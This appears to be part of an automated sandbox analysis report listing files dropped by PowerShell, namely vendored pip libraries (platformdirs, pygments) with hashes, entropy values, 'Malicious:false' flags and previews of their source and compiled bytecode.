                                                                                                                                                                                                                              SHA-512:D6802509B7D5D1F5693A93727A123C0C3DA6DD3AD5602A5D3B432D710AACF6C86C51B8C3B0145C179B288EBF223AD7D1F8B0F314374FD3DB7F75C088C008FD79
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................J.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.d...Z.e.d.k(..r...e...........y.y.).z.Main entry point......)...annotations)...PlatformDirs..__version__)...user_data_dir..user_config_dir..user_cache_dir..user_state_dir..user_log_dir..user_documents_dir..user_downloads_dir..user_pictures_dir..user_videos_dir..user_music_dir..user_runtime_dir..site_data_dir..site_config_dir..site_cache_dirc...........................d.}.d.}.t.........d.t...........d.............t.........d...........t.........|.|.d...........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.|.........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.d...........}.t.........D.]...}.t.........|...d.t.........|.|...........................y.).z.Run main ent
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9427
                                                                                                                                                                                                                              Entropy (8bit):5.244707946806239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:erZ/yKfyqItKHYfBSlfSUgHWTKW6pOK3MmaJ9ZTQs:el/Zfyq9xls2GW6pl3MjJXT/
                                                                                                                                                                                                                              MD5:29D2E85DBC1DC54266FFB0B58A99961A
                                                                                                                                                                                                                              SHA1:AB17E7F09777E8F2BEB80F3951A6A5BA8B3BCB58
                                                                                                                                                                                                                              SHA-256:397EBBAEFE6176A4A7F9F796497290CB6937A102C51F9E3E0FA315D9DB152958
                                                                                                                                                                                                                              SHA-512:A195637CBA301DAC2B06D2017BF63A60FAA38C7DDBD3DF774E3CAD6FBA847B597750FDD21391D7E867CFBD9D23B6327C99B201F7B43F818A681CA21BE28AFFA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf+.........................,.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z.d.g.Z.y.).z.Android......)...annotationsN)...lru_cache)...cast.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Androida$.... Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9655
                                                                                                                                                                                                                              Entropy (8bit):5.044968635026358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:pWGnDbkCIGjpgRhUWqEpUBo9B6++mj8dvHxLfcSWAhzg:p9nDIlKoAk8xHxRjzg
                                                                                                                                                                                                                              MD5:4B9C210EA808ECCD38C73501E8663AB4
                                                                                                                                                                                                                              SHA1:31B6DC096F55D84125ED5F4E528E18A9A3C22E5D
                                                                                                                                                                                                                              SHA-256:3950B2BA120D84AF30C506C69F6DE4D4FE8345102BC053FF79945FE497950841
                                                                                                                                                                                                                              SHA-512:E0E54421E976B0C1B047DC6E4C8AB4226365777FED58D8C22511A3B15997837B973EDBCE5EF5C04C062A5329C69209C92CBC375EC3AC3F4C6FBF8FA715C99AA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r d.d.l.Z.e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z.....G.d...d.e.........Z.y.).z.Base API......)...annotationsN)...ABC..abstractmethod)...Path)...TYPE_CHECKING)...........)...Literalc...........................e.Z.d.Z.d.Z...............d"..............................d#d...Z.d$d...Z.d%d...Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z e.d'd........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5620
                                                                                                                                                                                                                              Entropy (8bit):5.110906750003953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:jp7FCcbHm3E9nmnUGNI2ngsOUHIJtvv3KnRc:FxCcbHm3E1GN0sOqIfb
                                                                                                                                                                                                                              MD5:978997F9EF8E5A352F2CDEFB973A2DFC
                                                                                                                                                                                                                              SHA1:6B56EF0E2440AEF12356AD690095AB721EDB2AC4
                                                                                                                                                                                                                              SHA-256:70CFDE24A79B25F03AA94FF4167EE371590B9E7F4998269E8824B98ECD38271B
                                                                                                                                                                                                                              SHA-512:9F86E1AD7A76F53AEAAE3A6068D2C746D32AF062876A13F1619932A6FF915872471D9C286C05FD1CA00746816F453C661D69C3350723F9AF3EC44F7AAD6EC583
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf^.........................D.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.d.g.Z.y.).z.macOS......)...annotationsN.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...MacOSa..... Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. c.....................^.....|.j...................t...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12424
                                                                                                                                                                                                                              Entropy (8bit):5.2769378953529875
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:seYn+H5wHxeffr8/EmlCIY3gqZbDvyKdXpYJ:Y+HQx0z8/EnIYQeHvXdXpYJ
                                                                                                                                                                                                                              MD5:61F901CA418B1FCFC9DAA8C80D36FDAE
                                                                                                                                                                                                                              SHA1:B8908694763D1AD4E54D4817A9305B530C06B684
                                                                                                                                                                                                                              SHA-256:7549B091342D3A5877D0D5CAFFFAB4B0E376ADBE654BBC2FBEE378E0AD231FE9
                                                                                                                                                                                                                              SHA-512:804524BB68EDE1C55322571915C6E86351F7AEF23AB16A8A84BF95164FB42606CB4C34786807BB3A6FC1CCAFE6BF87D71087BBCAB596BF1A63A9D37C87C4C624
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfi".............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................d.k(..r.d.d...Z.n.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.g.Z.y.).z.Unix......)...annotationsN)...ConfigParser)...Path.....)...PlatformDirsABC..win32c...........................d.}.t.........|...........).Nz.should only be used on Unix)...RuntimeError)...msgs.... .NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/platformdirs/unix.py..getuidr........s........+......3...........).r....c.....................R.....e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.y.)...Unixa..... On Unix/Linux, we follow the. `XDG Basedir Spec <https://specifications.f
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                              Entropy (8bit):5.259158420795796
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:z8OsSITnIflyrtW3D6WNAQ9AC9w52KNdAreasGH5aylehK6Z+vYq:AOSIf4GmWJxKNnafH5aylehK6wZ
                                                                                                                                                                                                                              MD5:64C37424483DBFAA252B190F050DC53E
                                                                                                                                                                                                                              SHA1:506AFA15D76794A0A22333F915C3288601137E27
                                                                                                                                                                                                                              SHA-256:70B15FAC283A5FB8D036E4060891CF2C4C648FECA705C81BF9E63FF0E4748D7D
                                                                                                                                                                                                                              SHA-512:3F94D22B2EDB5B7DADE04566EB79AA42654A28956FEF5AD097430C88CC466D8A25CE16DA7407B77C18380E0FAFDD4357C55AC90AD1F23E3A9B7EB220B6E771AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.x.Z.Z.d.x.Z.Z.y.).z.3.8.1)................N)...__version__..version..__version_tuple__..version_tuple........QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/platformdirs/version.py..<module>r........s............. ......g.$-..-....Mr....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12982
                                                                                                                                                                                                                              Entropy (8bit):5.236562198921478
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:SEcw7wBXxIgB+DuMofny+hU85erYOaqsgcXk:SEcSwBXxIlDEPygUUerFvSk
                                                                                                                                                                                                                              MD5:BAE41D2550801381049C75279FDB63C4
                                                                                                                                                                                                                              SHA1:E34E6BBBA7F22A1BC2AC93AE4397700B79E8A5B2
                                                                                                                                                                                                                              SHA-256:92EA36F70E50F6B5318A819946EBBCCC9066EC6D36AECF7AEF6E0A05DBD2ADA2
                                                                                                                                                                                                                              SHA-512:D3F25C6B9AE9884F5CADDFDCC4C00DAD630277945F606CA0965599EE970550A19894ACA6120740D0E4812866B4273825053E8E2A06B9290B575EB86E550B688D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfe%..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....e.d.............e.................Z.d.g.Z.y.).z.Windows......)...annotationsN)...lru_cache)...TYPE_CHECKING.....)...PlatformDirsABC)...Callablec...........................e.Z.d.Z.d.Z.e.d.d...........Z.d.d...d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Windowsa..... `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7211
                                                                                                                                                                                                                              Entropy (8bit):4.742765976902356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:IGoI72STvJKTm3tKy1rdnDTgFPYOiPOVKiI//Kgd20HPhC:IG5ETmIyZ9UwlPOgfC/
                                                                                                                                                                                                                              MD5:B88ED255CD7DFB30CB3B29AC5DB896B3
                                                                                                                                                                                                                              SHA1:AFFD713179820AA4E5A202972DCF104BE2C978C2
                                                                                                                                                                                                                              SHA-256:CBF10430AC18976F9BCD8043A2F92C4A7F26EFAA27D0B75AF1EC8992C55013D5
                                                                                                                                                                                                                              SHA-512:26EBD3A543B1A7CC9DA502D5F3D8DAB0CAC0385C53F31F3DC254D0105BD6148C2A3A68B914400DF6974CB803B140EF95E6793E8B20EAD3752C8ADCBA664A372D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Android.""".from __future__ import annotations..import os.import re.import sys.from functools import lru_cache.from typing import cast..from .api import PlatformDirsABC...class Android(PlatformDirsABC):. """. Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``/data/user/<userid>/<packagename>/files/<AppName>``""". return self._append_app_name_and_version(cast(str, _android_folder()), "files").. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, same as `user_data_dir`""". return self.user_data_dir.. @property. def user_config_dir(self) -> str:. """.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7132
                                                                                                                                                                                                                              Entropy (8bit):4.492814423682991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9uSGliZEBgZNvVpRnjhGIFE+aswgvZ6Z/n1Fg/cw:9uSkcu+T/Z0w
                                                                                                                                                                                                                              MD5:CD9DAA2FBC97E78B4F2CCCA85EEE331C
                                                                                                                                                                                                                              SHA1:29FA6EB99DF6529E731EFB845F2D968858EBB392
                                                                                                                                                                                                                              SHA-256:8D6B57D3A8C0272B58AE42433AA125B3DEE60A4C87452664A2A5256CC2B941EC
                                                                                                                                                                                                                              SHA-512:07705C4A7B4A0981323851307C6D84A1E0ABD357D71E303BB515BF4861EFC017966DBDC225B7E1836E6BD6A7A68956CBB318DF48A6883E3744F5470245996832
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Base API.""".from __future__ import annotations..import os.from abc import ABC, abstractmethod.from pathlib import Path.from typing import TYPE_CHECKING..if TYPE_CHECKING:. import sys.. if sys.version_info >= (3, 8): # pragma: no cover (py38+). from typing import Literal. else: # pragma: no cover (py38+). from pip._vendor.typing_extensions import Literal...class PlatformDirsABC(ABC):. """Abstract base class for platform directories.""".. def __init__( # noqa: PLR0913. self,. appname: str | None = None,. appauthor: str | None | Literal[False] = None,. version: str | None = None,. roaming: bool = False, # noqa: FBT001, FBT002. multipath: bool = False, # noqa: FBT001, FBT002. opinion: bool = True, # noqa: FBT001, FBT002. ensure_exists: bool = False, # noqa: FBT001, FBT002. ) -> None:. """. Create a new platform directory... :param appname: See `appname`.. :param ap
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3678
                                                                                                                                                                                                                              Entropy (8bit):4.801640765455566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:OO97j3xWbKAyK4GbCnXlhSgtTeyDAHy+fRIW4oyviDiauyl9KapyT8aOwyoAsnaH:n7FojwNDMSnZvSfffMJORnRwZi5f
                                                                                                                                                                                                                              MD5:9668A7BB908E9053E7A226EC2002E273
                                                                                                                                                                                                                              SHA1:882A251FB3C3B34A19CC3FD6C2C0890C8A16F68E
                                                                                                                                                                                                                              SHA-256:2EE7953A85601960C1C106FC385C1791529F567DF708CD4B9307F5F80F3AB514
                                                                                                                                                                                                                              SHA-512:2217BE44BB1DE54F040DE9A21EA34C2C0349781283E0C029EAF3F513E6E2104C3FC63C0924C004F89124F4F3E7BA2DA38CD490388A7DE11BA48CB63FF37B8CC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""macOS.""".from __future__ import annotations..import os.path..from .api import PlatformDirsABC...class MacOS(PlatformDirsABC):. """. Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``~/Library/Application Support/$appname/$version``""". return self._append_app_name_and_version(os.path.expanduser("~/Library/Application Support")) # noqa: PTH111.. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8809
                                                                                                                                                                                                                              Entropy (8bit):4.794758253446687
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Vlp+wzUwWDKm07bHnAutWeWvSSBSQYjnTboj2Yl+rzuhRGkML+J:VeOygESS8BncSYl+G5J
                                                                                                                                                                                                                              MD5:79CDF1C44638AE984A2970F326A72109
                                                                                                                                                                                                                              SHA1:1277760E5B8E451F64EBF06FF97C74398EE2E082
                                                                                                                                                                                                                              SHA-256:DB626147C658D1A2F14950859CAADCE9FD62CFA1AFE362B6E036A3EDA4E37D28
                                                                                                                                                                                                                              SHA-512:0A7ED73FCEA6ECD6509F006500EA3E4290526BF9F3C4D86F142E6C0B1FC2F5068FEC40AC93995932FCD80E63DA22F6D17A9BBBC0BDB744D930DB51B6A211207E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Unix.""".from __future__ import annotations..import os.import sys.from configparser import ConfigParser.from pathlib import Path..from .api import PlatformDirsABC..if sys.platform == "win32":.. def getuid() -> int:. msg = "should only be used on Unix". raise RuntimeError(msg)..else:. from os import getuid...class Unix(PlatformDirsABC):. """. On Unix/Linux, we follow the. `XDG Basedir Spec <https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html>`_. The spec allows. overriding directories with environment variables. The examples show are the default values, alongside the name of. the environment variable that overrides them. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `multipath <platformdirs.api.PlatformDirsABC.multipath>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ens
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                              Entropy (8bit):4.561427135160526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Scb9cFWARQ7RYZG7zGN6zRXv3VyLQdLxZvBL4AbJAQnAj3qdJz:Scb+sARQ7CG7qN6iQdNpBRdAQnAGdh
                                                                                                                                                                                                                              MD5:600718EEF039BB1F40A5CDB508DC6C81
                                                                                                                                                                                                                              SHA1:758CF01A74194429A53AC797732AA6EA741ECB00
                                                                                                                                                                                                                              SHA-256:99ABD94D02092177DD7B011A4939FB116ACD7CF656791A1F6FEEF8C6A5B97F63
                                                                                                                                                                                                                              SHA-512:5BF4BD02594724A0C25C16CDECE84943692954E69B75BD042E35B0E48BDE503B16D75BCDEA58EE3B635AB235EC3EC4D6AC92FA0A1FD7586EA0E11A7493D4F650
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# file generated by setuptools_scm.# don't change, don't track in version control.__version__ = version = '3.8.1'.__version_tuple__ = version_tuple = (3, 8, 1).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9573
                                                                                                                                                                                                                              Entropy (8bit):5.075076832425199
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Dz5c0mNQSrvSYAnxq5p9cdNHpDP18y3r8kFfFc:f5c31+n26lfc
                                                                                                                                                                                                                              MD5:1B10C536F6870973A7FC134015A9E844
                                                                                                                                                                                                                              SHA1:4CA3A38027B37588FB1B16C3833B3D5E5581CFE5
                                                                                                                                                                                                                              SHA-256:E13B5B3C6A161B63D1808D75BAAB836BB79193C4DCC6F9D436EB8C19922D9D77
                                                                                                                                                                                                                              SHA-512:3A0A0DFA9F3292F2F653AB81D533C70825CD29ABF95B27266D2898D406670B0CF085BD2E35AD57A678F8F45AF59CFE5873FEF62FC7A1462D0750C6F1A57F9D86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Windows.""".from __future__ import annotations..import ctypes.import os.import sys.from functools import lru_cache.from typing import TYPE_CHECKING..from .api import PlatformDirsABC..if TYPE_CHECKING:. from collections.abc import Callable...class Windows(PlatformDirsABC):. """. `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `roaming <platformdirs.api.PlatformDirsABC.roaming>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """. :return: data directory tied to the user, e.g.. ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appn
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2983
                                                                                                                                                                                                                              Entropy (8bit):4.615037148370751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:4H4DMeNykEe7yMQTleKpKSGErxGpYWiywW6UiGkNyWkggGoHtLj1sfywL2niXGkM:4H4DtykEe7HswKpKSziYx9/NvUNtsFyp
                                                                                                                                                                                                                              MD5:CDD01A44CB801A2AF69D0D75DB8D1E13
                                                                                                                                                                                                                              SHA1:9B2DBD30889307DDA6766E27E21D9E5BE91E0801
                                                                                                                                                                                                                              SHA-256:E80B8396342DBDFF3D0D3354C9633B937A1494FFE5ABBD0D53E20D28AB5E3816
                                                                                                                                                                                                                              SHA-512:5A5461FC5B40A9931F8CD9893EDA2F6F09FCBDD79E555CD07D8E38729299776C60922BA8A877B5BD927B36BDE9D5C5CF17769F51F105D9A83F38747C3AE8AD31
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""". Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):353
                                                                                                                                                                                                                              Entropy (8bit):4.920011790990273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:Y6ejA2UeqOUcMrqA1Akssu9IuH8HodrC1QATkTAFMuwdlEkc:Y6epArqA1bssqn8HodmCVYMHd/c
                                                                                                                                                                                                                              MD5:10FA0A45A3D060D07E1C9E502923E13A
                                                                                                                                                                                                                              SHA1:2B06C1D0254222D69A45DB8451D6C5A884285E5A
                                                                                                                                                                                                                              SHA-256:7ACF0428CBD78F9C93A087D0FA97F70EFE539C879E33AB0C1342D6FA7E1E707A
                                                                                                                                                                                                                              SHA-512:031F304CA66A48AF4B064B92DBD79189E5164380E6D5B877042B40A59839217156581D7CBAF20B5F0C082EE65EC3936E26A58C33B3EDC7D4CFDB3A0CAD61BD7C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""". pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import sys.from pip._vendor.pygments.cmdline import main..try:. sys.exit(main(sys.argv)).except KeyboardInterrupt:. sys.exit(1).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3472
                                                                                                                                                                                                                              Entropy (8bit):5.480671609434922
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NAH4DtykEe7HswKpKSCNYpCMAfhMuzNKUNTMdbCeobUS:NltykEe7jdpbQUqdbC7p
                                                                                                                                                                                                                              MD5:16DF6777292F6DBB7911DC8DFB373C9B
                                                                                                                                                                                                                              SHA1:6613E6C4E3883F95FE4509159D31A8A81FA0B6ED
                                                                                                                                                                                                                              SHA-256:B2CEA032FB94593F6E1690E548A525FE1AB490324A6B966E35A7D0F317D35EBE
                                                                                                                                                                                                                              SHA-512:0371F14668705FF09069E34EE4B9C8569ADC04AD6752E2413590BB11DAB5A7B65DB532C2E164C61065CFEFE09022D1170DBDA419845C10153B3BFBB614480E76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................>.....d.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.g.d...Z.d...Z.d.d...Z.d.d...Z.y.).a..... Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygme
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):718
                                                                                                                                                                                                                              Entropy (8bit):5.544065905713021
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:dJSBcKh6FHvVyi6epArqA1bssqs4ZxIAOyfn+KNnaM3ajq12nMuNjytEHzK:z+gz6epAGAoq+IEWKNnfqjJjlHzK
                                                                                                                                                                                                                              MD5:902FC49B458746BE726B538EB6CCBADB
                                                                                                                                                                                                                              SHA1:DB5494C05D62256ADA8510827D8E20A36E35EDD6
